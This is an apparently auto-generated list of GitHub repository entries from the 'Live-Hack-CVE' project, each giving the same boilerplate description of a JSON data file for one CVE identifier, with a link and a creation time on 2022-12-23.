**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-29507 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-29507](https://github.com/Live-Hack-CVE/CVE-2020-29507) create time: 2022-12-23T13:39:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-29506 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-29506](https://github.com/Live-Hack-CVE/CVE-2020-29506) create time: 2022-12-23T13:39:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-5517 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-5517](https://github.com/Live-Hack-CVE/CVE-2020-5517) create time: 2022-12-23T13:39:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-26291 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-26291](https://github.com/Live-Hack-CVE/CVE-2020-26291) create time: 2022-12-23T13:37:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-1712 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-1712](https://github.com/Live-Hack-CVE/CVE-2020-1712) create time: 2022-12-23T13:36:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10232 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10232](https://github.com/Live-Hack-CVE/CVE-2020-10232) create time: 2022-12-23T13:35:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-5844 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-5844](https://github.com/Live-Hack-CVE/CVE-2020-5844) create time: 2022-12-23T13:35:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-11653 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-11653](https://github.com/Live-Hack-CVE/CVE-2020-11653) create time: 2022-12-23T13:33:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36518 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36518](https://github.com/Live-Hack-CVE/CVE-2020-36518) create time: 2022-12-23T13:31:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29334 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29334](https://github.com/Live-Hack-CVE/CVE-2021-29334) create time: 2022-12-23T14:16:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3652 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3652](https://github.com/Live-Hack-CVE/CVE-2021-3652) create time: 2022-12-23T14:15:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43044 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43044](https://github.com/Live-Hack-CVE/CVE-2021-43044) create time: 2022-12-23T14:13:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43043 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43043](https://github.com/Live-Hack-CVE/CVE-2021-43043) create time: 2022-12-23T14:13:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43042 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43042](https://github.com/Live-Hack-CVE/CVE-2021-43042) create time: 2022-12-23T14:12:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43041 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43041](https://github.com/Live-Hack-CVE/CVE-2021-43041) create time: 2022-12-23T14:12:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43040 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43040](https://github.com/Live-Hack-CVE/CVE-2021-43040) create time: 2022-12-23T14:12:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43039 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43039](https://github.com/Live-Hack-CVE/CVE-2021-43039) create time: 2022-12-23T14:12:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43038 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43038](https://github.com/Live-Hack-CVE/CVE-2021-43038) create time: 2022-12-23T14:12:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43037 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43037](https://github.com/Live-Hack-CVE/CVE-2021-43037) create time: 2022-12-23T14:12:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43036 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43036](https://github.com/Live-Hack-CVE/CVE-2021-43036) create time: 2022-12-23T14:12:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43035 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43035](https://github.com/Live-Hack-CVE/CVE-2021-43035) create time: 2022-12-23T14:12:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43034 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43034](https://github.com/Live-Hack-CVE/CVE-2021-43034) create time: 2022-12-23T14:12:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43033 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43033](https://github.com/Live-Hack-CVE/CVE-2021-43033) create time: 2022-12-23T14:12:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3982 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3982](https://github.com/Live-Hack-CVE/CVE-2021-3982) create time: 2022-12-23T14:11:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27516 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27516](https://github.com/Live-Hack-CVE/CVE-2021-27516) create time: 2022-12-23T13:37:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4217 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4217](https://github.com/Live-Hack-CVE/CVE-2021-4217) create time: 2022-12-23T13:36:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4207 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4207](https://github.com/Live-Hack-CVE/CVE-2021-4207) create time: 2022-12-23T13:36:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-42646 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-42646](https://github.com/Live-Hack-CVE/CVE-2021-42646) create time: 2022-12-23T13:35:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3623 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3623](https://github.com/Live-Hack-CVE/CVE-2021-3623) create time: 2022-12-23T13:34:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35939 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35939](https://github.com/Live-Hack-CVE/CVE-2021-35939) create time: 2022-12-23T13:34:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35938 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35938](https://github.com/Live-Hack-CVE/CVE-2021-35938) create time: 2022-12-23T13:34:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25059 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25059](https://github.com/Live-Hack-CVE/CVE-2021-25059) create time: 2022-12-23T13:28:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44140 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44140](https://github.com/Live-Hack-CVE/CVE-2022-44140) create time: 2022-12-23T14:16:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45208 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45208](https://github.com/Live-Hack-CVE/CVE-2022-45208) create time: 2022-12-23T14:16:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45210 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45210](https://github.com/Live-Hack-CVE/CVE-2022-45210) create time: 2022-12-23T14:16:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45207 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45207](https://github.com/Live-Hack-CVE/CVE-2022-45207) create time: 2022-12-23T14:16:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45206 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45206](https://github.com/Live-Hack-CVE/CVE-2022-45206) create time: 2022-12-23T14:16:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45205 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45205](https://github.com/Live-Hack-CVE/CVE-2022-45205) create time: 2022-12-23T14:16:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43213 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43213](https://github.com/Live-Hack-CVE/CVE-2022-43213) create time: 2022-12-23T14:15:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44118 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44118](https://github.com/Live-Hack-CVE/CVE-2022-44118) create time: 2022-12-23T14:15:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44859 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44859](https://github.com/Live-Hack-CVE/CVE-2022-44859) create time: 2022-12-23T14:15:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44860 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44860](https://github.com/Live-Hack-CVE/CVE-2022-44860) create time: 2022-12-23T14:15:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44858 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44858](https://github.com/Live-Hack-CVE/CVE-2022-44858) create time: 2022-12-23T14:15:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45363 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45363](https://github.com/Live-Hack-CVE/CVE-2022-45363) create time: 2022-12-23T14:15:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41446 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41446](https://github.com/Live-Hack-CVE/CVE-2022-41446) create time: 2022-12-23T14:15:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26280 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26280](https://github.com/Live-Hack-CVE/CVE-2022-26280) create time: 2022-12-23T14:15:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40770 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40770](https://github.com/Live-Hack-CVE/CVE-2022-40770) create time: 2022-12-23T14:15:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42322 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42322](https://github.com/Live-Hack-CVE/CVE-2022-42322) create time: 2022-12-23T14:14:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42325 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42325](https://github.com/Live-Hack-CVE/CVE-2022-42325) create time: 2022-12-23T14:14:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42323 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42323](https://github.com/Live-Hack-CVE/CVE-2022-42323) create time: 2022-12-23T14:14:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42321 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42321](https://github.com/Live-Hack-CVE/CVE-2022-42321) create time: 2022-12-23T14:14:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37032 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37032](https://github.com/Live-Hack-CVE/CVE-2022-37032) create time: 2022-12-23T14:14:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25917 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25917](https://github.com/Live-Hack-CVE/CVE-2022-25917) create time: 2022-12-23T14:14:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41618 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41618](https://github.com/Live-Hack-CVE/CVE-2022-41618) create time: 2022-12-23T14:14:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31608 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31608](https://github.com/Live-Hack-CVE/CVE-2022-31608) create time: 2022-12-23T14:14:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31606 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31606](https://github.com/Live-Hack-CVE/CVE-2022-31606) create time: 2022-12-23T14:14:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31612 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31612](https://github.com/Live-Hack-CVE/CVE-2022-31612) create time: 2022-12-23T14:14:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29827 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29827](https://github.com/Live-Hack-CVE/CVE-2022-29827) create time: 2022-12-23T14:14:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4090 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4090](https://github.com/Live-Hack-CVE/CVE-2022-4090) create time: 2022-12-23T14:14:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4089 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4089](https://github.com/Live-Hack-CVE/CVE-2022-4089) create time: 2022-12-23T14:14:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4088 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4088](https://github.com/Live-Hack-CVE/CVE-2022-4088) create time: 2022-12-23T14:14:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29833 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29833](https://github.com/Live-Hack-CVE/CVE-2022-29833) create time: 2022-12-23T14:14:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2009-0586 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2009-0586](https://github.com/Live-Hack-CVE/CVE-2009-0586) create time: 2022-12-23T12:57:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-2599 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-2599](https://github.com/Live-Hack-CVE/CVE-2017-2599) create time: 2022-12-23T12:54:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-16868 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-16868](https://github.com/Live-Hack-CVE/CVE-2018-16868) create time: 2022-12-23T12:54:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-1115 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-1115](https://github.com/Live-Hack-CVE/CVE-2018-1115) create time: 2022-12-23T12:54:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-10171 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-10171](https://github.com/Live-Hack-CVE/CVE-2019-10171) create time: 2022-12-23T12:54:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-10203 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-10203](https://github.com/Live-Hack-CVE/CVE-2019-10203) create time: 2022-12-23T12:54:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-10222 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-10222](https://github.com/Live-Hack-CVE/CVE-2019-10222) create time: 2022-12-23T12:54:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-14824 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-14824](https://github.com/Live-Hack-CVE/CVE-2019-14824) create time: 2022-12-23T12:54:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-7226 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-7226](https://github.com/Live-Hack-CVE/CVE-2019-7226) create time: 2022-12-23T12:54:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-7230 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-7230](https://github.com/Live-Hack-CVE/CVE-2019-7230) create time: 2022-12-23T12:54:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-7227 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-7227](https://github.com/Live-Hack-CVE/CVE-2019-7227) create time: 2022-12-23T12:54:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-7231 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-7231](https://github.com/Live-Hack-CVE/CVE-2019-7231) create time: 2022-12-23T12:54:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-7232 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-7232](https://github.com/Live-Hack-CVE/CVE-2019-7232) create time: 2022-12-23T12:54:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-7228 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-7228](https://github.com/Live-Hack-CVE/CVE-2019-7228) create time: 2022-12-23T12:54:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6957 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6957](https://github.com/Live-Hack-CVE/CVE-2019-6957) create time: 2022-12-23T12:54:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6811 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6811](https://github.com/Live-Hack-CVE/CVE-2019-6811) create time: 2022-12-23T12:54:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6840 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6840](https://github.com/Live-Hack-CVE/CVE-2019-6840) create time: 2022-12-23T12:54:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6837 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6837](https://github.com/Live-Hack-CVE/CVE-2019-6837) create time: 2022-12-23T12:53:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6835 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6835](https://github.com/Live-Hack-CVE/CVE-2019-6835) create time: 2022-12-23T12:53:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-14842 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-14842](https://github.com/Live-Hack-CVE/CVE-2019-14842) create time: 2022-12-23T12:53:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-7304 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-7304](https://github.com/Live-Hack-CVE/CVE-2019-7304) create time: 2022-12-23T12:53:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3876 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3876](https://github.com/Live-Hack-CVE/CVE-2019-3876) create time: 2022-12-23T12:53:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3893 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3893](https://github.com/Live-Hack-CVE/CVE-2019-3893) create time: 2022-12-23T12:53:40Z

